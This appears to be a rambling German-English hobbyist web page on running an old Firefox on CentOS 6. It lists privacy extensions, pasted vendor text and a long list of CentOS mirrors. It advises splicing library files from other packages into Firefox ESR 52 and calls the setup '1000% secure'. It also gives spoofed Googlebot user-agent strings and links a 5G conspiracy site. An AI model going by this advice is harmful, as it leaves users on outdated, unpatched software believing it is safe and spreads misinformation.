http://ftp.pbone.net/mirror/archive.fedoraproject.org/fedora/linux/updates/25/armhfp/Packages/m/mozilla-noscript-5.1.7-1.fc25.noarch.rpm, year 2017), https://rpm.pbone.net/index.php3/stat/4/idpl/54125427/dir/rawhide/com/mozilla-noscript-2.6.8.36-1.171.noarch.rpm.html, vom 16.11.2018 (171. Patch, daher die empfohlene Version) mozilla-adblockplus (-2.9.1-27 fc, el7, el6 or mozilla.org), https://fr2.rpmfind.net/linux/fedora-secondary/releases/29/Everything/i386/os/Packages/m/mozilla-adblockplus-2.9.1-4.fc29.noarch.rpm, https://fr2.rpmfind.net/linux/epel/6/x86_64/Packages/m/mozilla-adblockplus-2.6.6-1.el6.noarch.rpm mozilla-requestpolicy (-1.0-0.22.20171019git633302 fc27 from 02.08.2020 / 08.02.2020, el6, rpmfind.net or mozilla.org, you still have to copy it from /usr/share/mozilla/extensions/ to /home/surfuser/.mozilla/extensions/), https://fr2.rpmfind.net/linux/fedora/linux/releases/29/Everything/x86_64/ os/Packages/m/mozilla-requestpolicy-1.0-0.22.20171019git633302.fc29.noarch.rpm, https://fr2.rpmfind.net/linux/epel/6/x86_64/Packages/m/mozilla-requestpolicy-1.0-0.19.20171019git633302.el6.noarch.rpm mozilla-https-everywhere (fc, el6 or mozilla.org), https://fr2.rpmfind.net/linux/fedora/linux/updates/29/Everything/x86_64/Packages/m/mozilla-https-everywhere-2019.11.7-1.fc29.noarch.rpm, https://fr2.rpmfind.net/linux/epel/6/x86_64/Packages/m/mozilla-https-everywhere-2019.11.7-1.el6.noarch.rpm firefox-ublock_origin (alt1, pkgs.org, mozilla.org) mozilla-ublock-origin (fc, el7, el6) CanvasBlocker (mozilla.org, gegen Canvas Fingerprinting) CookieController (mozilla.org, part of Jondofox) Private Tab (mozilla.org) RefControl (mozilla.org, Referer Control) UserAgentSwitcher (mozilla.org) Link Redirect Fixer (mozilla.org) Link_Cleaner (mozilla.org) CSS Exfil Protection by Mike Gualtieri ( xpi von mozilla.org, https://addons.cdn.mozilla.net/user-media/addons/931864/css_exfil_protection-1.0.17-an+fx.xpi ) TrackMeNot (xpi), Firefox extension to protect web habits from tracking and profiling, protect against data profiling by search engines, "TrackMeNot is a lightweight browser extension that helps protect web searchers from surveillance and data-profiling by search engines. It does so not by means of concealment or encryption (i.e. covering one´s tracks), but instead by the opposite strategy: noise and obfuscation. With TrackMeNot actual web searches, lost in a cloud of false leads, are essentially hidden in plain view. User-installed TrackMeNot works with Firefox and Chrome browsers, integrates with all popular search engines and requires no 3rd-party servers or services. TrackMeNot runs as a low-priority background process, that periodically issues randomized search-queries to popular search engines, e.g., AOL, Yahoo!, Google, and Bing. It hides users´ actual search trails in a cloud of ´ghost´ queries, significantly increasing the difficulty of aggregating such data into accurate or identifying user profiles. TrackMeNot serves as a means of amplifying users´ discontent with advertising networks, that not only disregard privacy, but also facilitate the bulk surveillance agendas of corporate and government agencies, as documented recently in disclosures by Edward Snowden and others. To better simulate user behavior TrackMeNot uses a dynamic query mechanism to ´evolve´ each client (uniquely) over time, parsing the results of its searches for ´logical´ future query terms with which to replace those already used. The practice of logging user search activities and creating individual search profiles - sometimes identifiable - has received attention in mainstream press, e.g. the recent front-page New York Times article on AOL´s release of collected data on individual searchers; also this front-page New York Times Business Section article describing the User-Profiling Practices of Yahoo!, AOL, Bing & Google. We are disturbed by the idea that search inquiries are systematically monitored and stored by corporations like AOL, Yahoo!, Google, etc. and may even be available to third parties. Because the Web has grown into such a crucial repository of information and our search behaviors profoundly reflect who we are, what we care about, and how we live our lives, there is reason to feel they should be off-limits to arbitrary surveillance. But what can be done? Legal approaches -- urging legislators to support limits on access, or courts to extend Fourth Amendment protection -- might be effective, but would require orchestrated efforts by many parties. Appeals to search companies themselves seem even less hopeful as their interests, at least on the surface, are in direct conflict with such limits. Both, at best, are long term prospects. We have developed TrackMeNot as an immediate solution, implemented and controlled by users themselves. It fits within the class of strategies, described by Gary T. Marx, whereby individuals resist surveillance by taking advantage of blind spots inherent in large-scale systems1. TrackMeNot may not radically alter the privacy landscape but helps to place a particularly sensitive arena of contemporary life back in the hands of individuals, where it belongs in any free society. Public awareness of the vulnerability of searches to systematic surveillance and logging by search engine companies was initially raised in the wake of a case, initiated August 2005, in which the United States Department of Justice (DOJ) issued a subpoena to Google for one week´s worth of search query records (absent identifying information) and a random list of one million URLs from its Web index. This was cited as part of its defense of the constitutionality of the Child Online Protection Act (COPA). When Google refused, the DOJ filed a motion in a Federal District Court to force compliance. Google argued that the request imposed a burden, would compromise trade secrets, undermine customers´ trust in Google, and have a chilling effect on search activities. In March 2006, the Court granted a reduced version of the first motion, ordering Google to provide a random listing of 50,000 URLs, but denied the second motion, namely, the request for search queries. While viewed from the perspective of user privacy this seems a good outcome, yet it does bring to light several disquieting points. First, from court documents we learn that AOL, Yahoo!, and Microsoft have complied with the government´s request, though details are not given. Second, we must face the reality that logs of our online searches are in the hands of search companies and can be quite easily linked to our identities. Thirdly, it is clear we have little idea of, or say in, what can be done with these logs. While, in this instance, Google withheld such records from the Government, it would be foolish to count on this outcome in the future. Public awareness of the vulnerability of searches to systematic surveillance and logging by search engine companies, was initially raised in the wake of a case, initiated August 2005, in which the United States Department of Justice (DOJ) issued a subpoena to Google for one week´s worth of search query records (absent identifying information) and a random list of one million URLs from its Web index. This was cited as part of its defense of the constitutionality of the Child Online Protection Act (COPA). When Google refused, the DOJ filed a motion in a Federal District Court to force compliance. Google argued that the request imposed a burden, would compromise trade secrets, undermine customers´ trust in Google, and have a chilling effect on search activities. In March 2006, the Court granted a reduced version of the first motion, ordering Google to provide a random listing of 50,000 URLs, but denied the second motion, namely, the request for search queries. While viewed from the perspective of user privacy this seems a good outcome, yet it does bring to light several disquieting points. First, from court documents we learn that AOL, Yahoo!, and Microsoft have complied with the government´s request, though details are not given. Second, we must face the reality that logs of our online searches are in the hands of search companies and can be quite easily linked to our identities. Thirdly, it is clear we have little idea of, or say in, what can be done with these logs. While, in this instance, Google withheld such records from the Government, it would be foolish to count on this outcome in the future. TrackMeNot is user-installed and user-managed, residing wholly on users´ system and functions without the need for 3rd-party servers or services. Placing users in full control is an essential feature of TrackMeNot, whose purpose is to protect against the unilateral policies set by search companies in their handling of our personal information. We have developed TrackMeNot as an immediate solution, implemented and controlled by users themselves. It fits within the class of strategies, described by Gary T. Marx, whereby individuals resist surveillance by taking advantage of blind spots inherent in large-scale systems. TrackMeNot may not radically alter the privacy landscape but helps to place a particularly sensitive arena of contemporary life back in the hands of individuals, where it belongs in any free society. Special thanks to the NYU Dept of Computer Science, the Media Research Lab, the Mozilla Foundation, Missing Pixel, the Portia Project, Babelzilla, Ernest Davis, Michael Zimmer, John Fanning, and Robb Bifano." Installation, Download und Einzelheiten von https://www.cs.nyu.edu/trackmenot/, https://trackmenot.io Algorithmen auf Spurensuche - so verkleinerst Du Deinen digitalen Fußabdruck, uncut-news.ch@horizonworld.de, 25.06.2021 WWW-Worlwideweb Wer kennt es nicht: Wir surfen durchs Internet, scrollen unseren Feed in Facebook durch und siehe da: Werbung! Aber natürlich nicht irgendeine Werbung, sondern genau die eines Produkts, über welches wir gerade gestern noch gesprochen haben. Oder Klamotten, die komischerweise genau unserem Geschmack entsprechen. Manchmal ein wenig gruselig ist dieses Phänomen in Zeiten der Digitalisierung gar nicht mal so besonders. Denn der digitale Fußabdruck, den wir beim surfen im Internet hinterlassen, ermöglicht es Werbetreibenden, Dinge über uns zu erfahren, die wir manchmal lieber für uns behalten würden. Der digitale Fußabdruck bietet allerdings nicht nur Bühne für Werbetreibende. Auch Hacker und andere kriminelle Gruppen können sich so in unser Leben schleichen und unsere Daten missbrauchen. Glücklicherweise bietet die Digitalisierung aber auch hier Möglichkeiten, den eigenen digitalen Fußabdruck zu tracken und im Zweifelsfall zu verkleinern. https://www.horizonworld.de/algorithmen-auf-spurensuche-so-verkleinerst-du-deinen-digitalen-fussabdruck/ https://uncutnews.ch/algorithmen-auf-spurensuche-so-verkleinerst-du-deinen-digitalen-fussabdruck/ Privacy Badger - "Privacy Bader - How does Privacy Badger work? When you view a webpage, that page will often be made up of content from many different sources. (For example, a news webpage might load the actual article from the news company, ads from an ad company, and the comments section from a different company that´s been contracted out to provide that service.) Privacy Badger keeps track of all of this. If as you browse the web, the same source seems to be tracking your browser across different websites, then Privacy Badger springs into action, telling your browser not to load any more content from that source. And when your browser stops loading content from a source, that source can no longer track you. Voila! At a more technical level, Privacy Badger keeps note of the "third party" domains that embed images, scripts and advertising in the pages you visit. Privacy Badger looks for tracking techniques like uniquely identifying cookies, local storage "supercookies," first to third party cookie sharing via image pixels, and canvas fingerprinting. If it observes a single third-party host tracking you on three separate sites, Privacy Badger will automatically disallow content from that third-party tracker. In some cases a third-party domain provides some important aspect of a page´s functionality, such as embedded maps, images, or stylesheets. In those cases Privacy Badger will allow connections to the third party but will screen out its tracking cookies and referrers (these hosts have their sliders set to the middle,"cookie block" position). Does Privacy Badger account for a cookie that was used to track me even if I deleted it? Yes. Privacy Badger keeps track of cookies that could be used to track you and where they came from, even if you frequently clear your browser´s cookies. Does Privacy Badger still work when blocking third-party cookies in the browser? When you tell your browser to deny third-party cookies, Privacy Badger still gets to learn from third parties trying to set cookies via HTTP headers (as well as from other tracking techniques such as pixel cookie sharing and canvas fingerprinting). Privacy Badger no longer gets to learn from cookies or HTML5 local storage being set via JavaScript, however. So, Privacy Badger still works, it´ll just learn to block fewer trackers. Clearing history or already-set cookies shouldn´t have any effect on Privacy Badger. How does Privacy Badger handle social media widgets? Social media widgets (such as the Facebook Like button, Twitter Tweet button, or Google +1 button) often track your reading habits. Even if you don´t click them, the social media companies often see exactly which pages you´re seeing the widget on. Privacy Badger includes a feature imported from the ShareMeNot project which is able to replace the widgets with a stand-in version, so that you can still see and click them. You will not be tracked by these replacements unless you explicitly choose to click them. Privacy Badger currently knows how to replace the following widgets if they are observed tracking you: AddThis, Facebook, Google, LinkedIn, Pinterest, Stumbleupon, and Twitter. (The source code for these replacements is here; pull requests are welcome.) Note, that Privacy Badger will not replace social media widgets unless it has blocked the associated tracker. If you´re seeing real social media widgets, it generally means that Privacy Badger hasn´t detected tracking from that variant of the widget, or that the site you´re looking at has implemented its own version of the widget. To avoid confusion, the replacement widgets are marked with the Privacy Badger badge next to the button. To interact with a replacement widget, simply click on it. Depending on the widget, Privacy Badger will either send you directly to the appropriate sharing page (for example, to post a tweet) or it will enable and load the real social widget (for example, the Facebook Like button, with personalized information about how many of your friends have "liked" the page). In the second case, you will still need to interact with the real widget to "like" or share the page." https://privacybadger.org/#How-does-Privacy-Badger-work https://privacybadger.org/ https://www.eff.org/files/privacy-badger-latest.xpi secretagent (u.a. anonymisierende Browser-Kennungen (User-Agents); Erweiterung von palemoon.org) Librefox: https://github.com/intika/Librefox/releases/download/Librefox-v2.1-v64.0.0/Librefox-2.1-Firefox-Linux-64.0.0.zip kmozillahelper: Diesen Zombie deinstallieren! Update MozillaFirefox-52.9.0 (OpenSuSE: Februar 2019, gecko-engine / firefox-extensions ) mit derzeit aktuellem firefox-68.6.0 (el6, April 2020, quantum engine / webextensions): Stand: Februar 2019 Entpacke folgende Dateien aus firefox-68.6.0 (el6, rpm, Stand: April 2020) nach /usr/lib64/firefox/: gtk2 (Verzeichnis) fonts (Verzeichnis) run-mozilla.sh libmozavcodec.so libmozavutil.so libmozsqlite3.so libssl3.so (aus rpm openssl-1.1.1a bis openssl-1.1.1e) Entpacke folgende Dateien aus seamonkey (el6, rpm, Stand: September 2019) nach /usr/lib64/firefox/ liblgpllibs.so libmozsandbox.so plugin-container.so Entpacke folgende Dateien aus seamonkey (el6, rpm, Stand: September 2019) nach /usr/lib64/firefox/chrome/icons/default en-US.aff en-US.dic Entpacke folgende Dateien aus seamonkey (el6, rpm, Stand: September 2019) nach /usr/lib64/firefox/browser/ blocklist.xml ... damit immer noch nicht geupdatet: libxul.so (gecko, Stand: February 2019): seamonkey (el6, Stand: Semptmer 2019) komplett installieren oder Firefox-Quellcode patchen: https://hg.mozilla.org/releases/mozilla-esr60 (diff) https://hg.mozilla.org/releases/mozilla-esr68 (diff) ... Eventuell sind noch IDs usw. auszutragen. Editiere /usr/lib64/firefox/application.ini und /usr/lib64/firefox/platform.ini und setze dort die Werte mehr nach eigenen Vorstellungen. Zahlreiche Werte innerhalb "about:config" werden mit jedem Start von Firefox von selbst durch die Konfigurationsdatei user.js aus dem Profil in /home/surfuser/.mozilla/firefox/profilename/ gesetzt. user.js wird weiter unten aufgelistet. FirefoxESR-52-patches 2019: 2019-11-30 Updated package firefox-esr52 52.9.0-5 Muflone 2019-06-22 Updated package firefox-esr52 52.9.0-4 Muflone 2019-06-13 Updated package firefox-esr52 52.9.0-3 Muflone 2018-08-11 Updated package firefox-esr52 52.9.0-2 Muflone https://aur.archlinux.org/cgit/aur.git/?h=firefox-esr52 Update Mozilla Firefox Javascript mozjs (el6) https://fr2.rpmfind.net Warnung: Firefox-ESR &=60; (el6), ff-60-ESR (el6), ff-68-ESR (el6), ... mit Engine Quantum und Google-Webextension läuft ohne mehr als wichtige Erweiterungen wie Request(Block)PolicyContinued ! [SOLVED by Gooken, 15.03.2020] Firefox updatet die Version einer Erweiterung unter Menüpunkt Addons nicht (z.B. nach der Installation voni rpm mozilla-adblockplus (fc30, fc29) aufgrund fehllender xpi-Datei im Paket), so dass Firefox immer noch mit der installierten Vorgängerversion arbeitet? Die im Profil in einem Unterverzeichnis befindliche, zugehörige .xpi-Datei der Vorgängerversion löschen, alles von dieser Erweiterung aus /usr/share/mozilla/extensions/ nach /home/surfuser/.mozilla/extensions mit dem Befehl "cp -axf" kopieren und die Eigentums und Zugriffsrechte darauf setzen! Nun, nach einem Neustart von Firefox, wird die neue, korrekte Versionsnummer der Erweiterung unter Addons erstmals angezeigt, mit der Firefox fortan arbeitet. Anonymisierende Browserkennungen für Erweiterungen wie secretagent: "Privoxy/1.0" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "Mozilla/5.0 (compatible; Gooken; +http://www.gooken.de)" Probleme auf Webseiten, irgendwelche unerwünschte Funktionseinschränkungen (inbes. bei Formularen)? Meist sorgen die Extension mit ihren zahlreichen Einstellungsmöglichkeiten dafür, in unserem Fall meist noscript, ABP und RequestpolicyBlockContinued. Aber auch SecretAgent und RefControl usw. kommen hierfür infrage. Die Einstellungen sollte man in der benannten Reihenfolge von Erweiterung zu Erweiterung dann nochmal durchgehen. Dabei wird die Webseite gelegentlich von selbst neu geladen. Hilft alles nichts, deaktivere man die Erweiterungen in Menü->Addons -> Erweiterungen/Extensions vorü,bergehend entweder nach und nach oder einfach: allesamt. JavaScript sollte dabei stets aktiviert sein (javascript.enable in about:config auf TRUE oder am besten per Javascript-AN/AUS-Buttom-Erweiterung). Noch einmal die Webseite laden- fertig. Nun müsste es aber mit dem Firefox-52.9.0-ESR klappen. Nach dem Verlassen der Webseite sollten die Erweiterungen natürlich wieder aktivert werden! Fast alle Dateien von ESR-52.9.0 bis auf libxul.so, einige wenige libraries und die Einstellungs-Maske omni.ja lassen sich mit neueren Firefox wie ESR-60.9.0 und ESR-68 austauschen. kmozillahelper (Zombie-Prozess): Update mit kmozillahelper (rosa2014.1) oder mit "rpm -e --nodeps" deinstallieren. Wichtige Studie über die Sicherheit mit Firefox (gecko) https://12bytes.org/articles/tech/firefox/firefoxgecko-configuration-guide-for-privacy-and-performance-buffs [SOLVED: Erweiterungen und Einstellungen sorgen für unerwünschte Restriktionen auf einzelnen Webseiten: Kein möglicher Login etc.] Hilft das "Rumfummeln" an den Ereweiterungen nicht weiter, empfiehlt sich die Anlage eines neuen (zweiten) Profils: mit about:profiles ein neues (weiteres) Profil anlegen und vorü,bergehend zum default-Profile setzen, anschließend Firefox neustarten. Mehr zum Thema "Sicherheit mit Firefox (Gecko)": weiter unten (auf dieser Webseite)! "Computer - es geht kaum noch kaputter" ":Nichts kann normaler sein, als schon mal beim Provider rauszufliegen", ein IT-Experte und Computer-Programmierer aus Hamburg, frühe 80er Jahre. Also mal angenommen, Sie sind so "klug" und haben einen Computer (wovon wir hier ausgehen), und Ihnen gelingt der Zugang zum Internet auf mal immer nicht mehr. Probleme mit dem Netzadapter sind ja insbesonders unter MS Windows seit mehreren Jahrzehnten mehr als bekannt, siehe trojaner-board.de#Windows. Dann rufen Sie nach einer kurzen Überprüfung der Kabelverdindungen, des BIOS und der Netzkonfiguration am Mäuseklavier wahrscheinlich Ihren Provider an, das Problem zu beheben. Ihr vom Provider gelieferter DSL.Router/-Modem mag obendrein wie typischerweise älter als 10 Jahre alt sein (Normalfall). Was aber, wenn er nach all seinen angeblichen Überprüfungen und Maßnahmen das Problem einfach auf Ihren Computer schiebt? Dann müssten Sie eine neue Ethernetkarte kaufen, dann das Betriebssystem neu installieren und anschließend, Schreck lass nach, auch noch einen neuen Computer kaufen! Und auch das Betriebssystem kann ja dann immer noch (angeblich?) schuld daran sein. Mitunter liegt das Problem tatsächlich beim Provider, der Ihren Netzzugang einfach gesperrt hat. Es kommt dann weiterhin zu Aussage gegen Aussage. Unterm Strich sind und bleiben Sie mit Ihrem Computer von der Außenwelt für immer hoffnungslos abgeschnitten, verhält sich Ihr neuer Provider auf mal wie der Vorgänger (warum sollte er das eigentlich nicht tun?).. Kommts dann auch noch zur Anzeige, glaubt die Deutsche Justiz höchstwahrscheinlich Ihren Providern. Das ganze Problem lässt sich also überhaupt nicht beheben, auf dem Berg des üblichen Technikschrotts und Unmengen an Rechnungen für immer sitzenzubleiben, denn auch Ihr Online-Bankkonto bleibt für immer unzugängnlich, den Rest Ihrer Glaubwürdigkeit bei Firmen, Staat, weil Banken hoffnungslos verspielen zu müssen. Die Netze gehören ... So ein Fall ist auf Dauer doch nur umso wahrscheinlicher, oder er kanns über Nacht einmal (für alle) werden ! Schließlich bleibt Ihnen gar nichts anderes übrig, als einen Techniker, stets von der Telekom (!) zu holen, der all Ihre passwortgeschützte Logins hindurch alles an Ihrem Computer nochmal überprüft. Und wars dann das Kabel oder so, ist alles verloren! Und schon gibt es niemand, der Ihnen dann noch hilft..., Text 2022 by Gooken (dieser Fall hat sich nämlich bei einigen Bekannten von uns tatsächlich längst zugetragen! Einer davon stieg deswegen nach Providerwechsel von Vodafone zu Telekom von MS Windows 2010 auf Chromebook um (... das tut doch leid!). Wiederum ein anderer, meine Nachbarin, die 90er Jahre mit dem gleichen Problem, bestellte daraufhin gleich alles (den ganzen Computer) ab. Auf trojaner-board.de hängen für alle einsichtig unzählige solcher Probleme mit dem Netzadapter von MS Windows und Linux aus. Komisch auch der in Programmiersprachen wie Perl geschriebene "net_adapter" für die Tray der Symbolleiste von Linux für die Einwahl des Benutzers ins Netz. Er ist nur für ältere Linux-Systemen erhältlich und von daher veraltert. ... 06. Feb 2022 Ausführen von Code mit höheren Privilegien in kernel-tools 06. Feb 2022 Ausführen von Code mit höheren Privilegien in Linux (KERNEL) 06. Feb 2022 Ausführen von Code mit höheren Privilegien in kernel-headers 06. Feb 2022 Mehrere Probleme in webkit2gtk3 05. Feb 2022 Ausführen von Code mit höheren Privilegien in kernel-tools 05. Feb 2022 Ausführen von Code mit höheren Privilegien in kernel-headers 05. Feb 2022 Ausführen von Code mit höheren Privilegien in Linux (KERNEL) 05. Feb 2022 Zwei Probleme in util-linux ..., pro-linux.de, Sicherheit, 08.02.2022 Allgemein weiter gings vor Jahren ja auch denn mit dem Smartphone... Unterlassen Sie bei z.B. Alditalk über ein paar Monate eine Überweisung eines Mindestbetrags auf das Providerkonto, erhalten Sie irgendwann folgende SMS von diesem SIM-card-Provider: "Überweisen Sie bitte auf ihr Konto! Andernfalls werden wir in 14 TagenIhre Rufnummer endgültig sperren." Gesagt - schnell kurz vor Ablauf noch eine einzige SMS dazu abgeschickt - getan: Nun schlummert da doch glatt Zeit meines Lebens ein für eigentlich alle Beteiligten unzugänglicher Betrag von 5 Euro für immer und ewig bei Alditalk (WLAN-Zugang) !. Die Option "Tarif buchen" kann selbst bei mehr Willen nur so oder so nur noch übers Internet mit ganz speziellen Browsern auf alditalk.de genutzt werden, wenn die Alditalk-App hoffnungslos veraltert ist, unter "Optionen" nur noch eine Fehlermeldung zu erhalten und neuere Versionen nur auf Android ab 5 laufen. Provider sind mit dem Erwerb einer SIM-Karte immer im Besitz der Personalausweis-Daten - und uns ist gar nicht wohl..
https://brd-schwindel.ru/mord-auf-raten-stoppt-5g-und-die-brd/ Krebsforschungsinstitut IARC der Weltgesundheitsorganisation WHO 31 Fachleute aus 14 Ländern hatten rund eine Woche lang "nahezu sämtliche verfügbaren wissenschaftlichen Belege" ausgewertet, wie die Internationalen Agentur für Krebsforschung IARC zum Abschluss der Beratungen in Lyon mitteilte. Dabei ging es um hochfrequente elektromagnetische Strahlung, wie sie von Handys, aber auch von Rundfunk und Radar benutzt wird. Ein Krebsrisiko durch Handys kann demnach nicht ausgeschlossen werden. Die IARC ist das Krebsforschungsinstitut der Weltgesundheitsorganisation WHO. http://www.wiwo.de/technologie/forschung/gesundheit-wie-gefaehrlich-handystrahlung-wirklich-ist/7491090.html Mehr dazu: auf dieser Seite im Kommenden! Prozession 2010 bis 2026+ u.a. durch el6 (bzw. el7) Der Computer: 1000% sicher, mausklick-schnell, alles lifetime für (fast) umsonst) Er ließ sich auf mal nicht mehr helfen (alles intakt!) 2009/2010: Jahr des Computers, Jahr der Hard- und Software (CentOS el6 (Start 2010), Mandriva 2010.2) - ALLES RUND UM DEN COMPUTER IST GELAUFEN! (!!!) ... weitgehend flächendeckend und auch sicherheitstechnisch: nur noch Verfollständigen und Updaten (siehe Update-Listing von unserer Webseite "Universal Linux 2010"! CentOS- bzw. SL-Updates (el6) werden dabei von 2010 bis 2026 und (mit el7) länger angeboten. Entsprechende unverwüstliche und obendrein Strom sparende und mausklick-schnelle Linux-kompatible Lifetime-Hardware (*) für (fast) umsonst wird bei uns im -> Datenblatt Gerät für Gerät aufgelistet: All-in-one-Mainboard, zugehöriges Netzteil, alles strahlungsarm und supersilent, Ultraslim-WLED-TFT, SSD, Rom-Laufwerk (DVD-Brenner), Multifunktionsdrucker (Drucken-Scannen-Faxen-Kopieren), Maus/Tastatur, Gehäuse, ... Dabei gings (und gehts) mit dem Computer an für sich bekanntlich kaum noch kaputter... (siehe Exkurs und unter News&Links). (*) Lifetime-Hardware: Über etwaige Reparaturfälle und Defekte werden wir auf der von uns empfohlenen Hardware im Datenblatt unter Mainboard künftig berichten, bislang (04.03.2019) Fehlanzeige, keine. Installations- und Updatequellen von Enterprise Linux CentOS bzw. Scientific Linux (el6, el7) http://mirror.eu.oneandone.net/linux/distributions/centos/6.10/isos/x86_64/ http://mirror.jgotteswinter.com/centos/6.10/isos/x86_64/ http://wftp.tu-chemnitz.de/pub/linux/centos/6.10/isos/x86_64/ http://ftp.halifax.rwth-aachen.de/centos/6.10/isos/x86_64/ http://ftp.rrzn.uni-hannover.de/centos/6.10/isos/x86_64/ http://mirror.de.leaseweb.net/centos/6.10/isos/x86_64/ http://mirror.softaculous.com/centos/6.10/isos/x86_64/ http://artfiles.org/centos.org/6.10/isos/x86_64/ http://mirror.cuegee.de/centos/6.10/isos/x86_64/ http://centos.bio.lmu.de/6.10/isos/x86_64/ http://ftp.hosteurope.de/mirror/centos.org/6.10/isos/x86_64/ http://mirror.daniel-jost.net/centos/6.10/isos/x86_64/ http://mirrors.cicku.me/centos/6.10/isos/x86_64/ http://mirror.yannic-bonenberger.com/centos/6.10/isos/x86_64/ http://centos.datente.com/media/6.10/isos/x86_64/ http://mirror.dataone.nl/centos/6.10/isos/x86_64/ http://centos.schlundtech.de/6.10/isos/x86_64/ http://ftp.plusline.de/centos/6.10/isos/x86_64/ http://ftp.fau.de/centos/6.10/isos/x86_64/ http://centos.mirrors.as250.net/6.10/isos/x86_64/ http://mirror2.hs-esslingen.de/centos/6.10/isos/x86_64/ http://mirror1.hs-esslingen.de/pub/Mirrors/centos/6.10/isos/x86_64/ http://mirror.rackspeed.de/centos.org//6.10/isos/x86_64/ http://mirror.ratiokontakt.de/mirror/centos/6.10/isos/x86_64/ http://mirror.netcologne.de/centos/6.10/isos/x86_64/ http://repo.de.bigstepcloud.com/centos/6.10/isos/x86_64/ http://mirror.euserv.net/linux/centos/6.10/isos/x86_64/ http://ftp.wrz.de/pub/CentOS/6.10/isos/x86_64/ http://centos.intergenia.de/6.10/isos/x86_64/ http://centos.mirror.net-d-sign.de/6.10/isos/x86_64/ http://mirror.imt-systems.com/centos/6.10/isos/x86_64/ http://mirror.23media.de/centos/6.10/isos/x86_64/ Nearby Countries http://mirror.unix-solutions.be/centos/6.10/isos/x86_64/ http://centos.cu.be/6.10/isos/x86_64/ http://mirror.kinamo.be/centos/6.10/isos/x86_64/ http://centos.mirror.nucleus.be/6.10/isos/x86_64/ http://mirror.spreitzer.ch/centos/6.10/isos/x86_64/ http://linuxsoft.cern.ch/centos/6.10/isos/x86_64/ http://mirror.switch.ch/ftp/mirror/centos/6.10/isos/x86_64/ http://pkg.adfinis-sygroup.ch/centos/6.10/isos/x86_64/ http://mirror.plusserver.com/centos/6.10/isos/x86_64/ http://ftp.ciril.fr/pub/linux/centos/6.10/isos/x86_64/ http://mirror1.evolution-host.com/centos/6.10/isos/x86_64/ http://centos.crazyfrogs.org/6.10/isos/x86_64/ http://distrib-coffee.ipsl.jussieu.fr/pub/linux/centos/6.10/isos/x86_64/ http://centos.mirror.fr.planethoster.net/6.10/isos/x86_64/ http://ftp.rezopole.net/centos/6.10/isos/x86_64/ http://mirror.in2p3.fr/linux/CentOS/6.10/isos/x86_64/ http://mirrors.ircam.fr/pub/CentOS/6.10/isos/x86_64/ http://mir01.syntis.net/CentOS/6.10/isos/x86_64/ ftp://ftp.free.fr/mirrors/ftp.centos.org/6.10/isos/x86_64/ http://mirrors.standaloneinstaller.com/centos/6.10/isos/x86_64/ http://centos.mirrors.ovh.net/ftp.centos.org/6.10/isos/x86_64/ http://centos.mirror.ate.info/6.10/isos/x86_64/ http://fr.mirror.babylon.network/centos/6.10/isos/x86_64/ http://centos.quelquesmots.fr/6.10/isos/x86_64/ http://ftp.pasteur.fr/mirrors/CentOS/6.10/isos/x86_64/ http://mirrors.atosworldline.com/public/centos/6.10/isos/x86_64/ http://mirror.ibcp.fr/pub/Centos/6.10/isos/x86_64/ http://miroir.univ-paris13.fr/centos/6.10/isos/x86_64/ http://fr2.rpmfind.net/linux/centos/6.10/isos/x86_64/ http://centos.trisect.eu/6.10/isos/x86_64/ http://linux.cs.uu.nl/centos/6.10/isos/x86_64/ http://mirror.yourwebhoster.eu/centos/6.10/isos/x86_64/ http://mirror.colocenter.nl/pub/centos/6.10/isos/x86_64/ http://mirror.proserve.nl/centos/6.10/isos/x86_64/ http://mirror.i3d.net/pub/centos/6.10/isos/x86_64/ http://mirror.serverbeheren.nl/centos/6.10/isos/x86_64/ http://mirror.amsiohosting.net/centos.org/6.10/isos/x86_64/ http://mirror.1000mbps.com/centos/6.10/isos/x86_64/ http://mirror.widexs.nl/ftp/pub/os/Linux/distr/centos/6.10/isos/x86_64/ http://mirror.previder.nl/centos/6.10/isos/x86_64/ http://mirror.nl.leaseweb.net/centos/6.10/isos/x86_64/ http://mirror.denit.net/centos/6.10/isos/x86_64/ http://mirror.sitbv.nl/centos/6.10/isos/x86_64/ http://ftp.tudelft.nl/centos.org/6.10/isos/x86_64/ http://nl.mirror.babylon.network/centos/6.10/isos/x86_64/ http://mirror.cj2.nl/centos/6.10/isos/x86_64/ http://mirror.oxilion.nl/centos/6.10/isos/x86_64/ http://centos.ams.host-engine.com/6.10/isos/x86_64/ http://ftp.nluug.nl/ftp/pub/os/Linux/distr/CentOS/6.10/isos/x86_64/ http://mirror.netrouting.net/centos/6.10/isos/x86_64/ http://mirror.prolocation.net/centos/6.10/isos/x86_64/ http://centos.mirror1.spango.com/6.10/isos/x86_64/ http://mirror.schoemaker.systems/centos/6.10/isos/x86_64/ http://mirror.nforce.com/pub/linux/CentOS/6.10/isos/x86_64/ http://mirrors.supportex.net/centos/6.10/isos/x86_64/ http://mirrors.noction.com/centos/6.10/isos/x86_64/ http://centos.mirror.triple-it.nl/6.10/isos/x86_64/ http://centos.mirror.transip.nl/6.10/isos/x86_64/ http://mirror.fysik.dtu.dk/linux/centos/6.10/isos/x86_64/ http://ftp.klid.dk/ftp/centos/6.10/isos/x86_64/ http://mirrors.dk.telia.net/centos/6.10/isos/x86_64/ http://mirror.one.com/centos/6.10/isos/x86_64/ http://ftp.crc.dk/centos/6.10/isos/x86_64/ http://mirror.mhd.uk.as44574.net/mirror.centos.org/6.10/isos/x86_64/ http://centos.mirrors.nublue.co.uk/6.10/isos/x86_64/ http://mirrors.melbourne.co.uk/sites/ftp.centos.org/centos/6.10/isos/x86_64/ http://www.mirrorservice.org/sites/mirror.centos.org/6.10/isos/x86_64/ http://anorien.csc.warwick.ac.uk/mirrors/centos/6.10/isos/x86_64/ http://mirrors.clouvider.net/CentOS/6.10/isos/x86_64/ http://mirror.bytemark.co.uk/centos/6.10/isos/x86_64/ http://mirror.econdc.com/centos/6.10/isos/x86_64/ http://mirrors.vooservers.com/centos/6.10/isos/x86_64/ http://mirrors.ukfast.co.uk/sites/ftp.centos.org/6.10/isos/x86_64/ http://centos.serverspace.co.uk/centos/6.10/isos/x86_64/ http://centos.mirroring.pulsant.co.uk/6.10/isos/x86_64/ http://mirror.sov.uk.goscomb.net/centos/6.10/isos/x86_64/ http://mirror.vorboss.net/centos/6.10/isos/x86_64/ 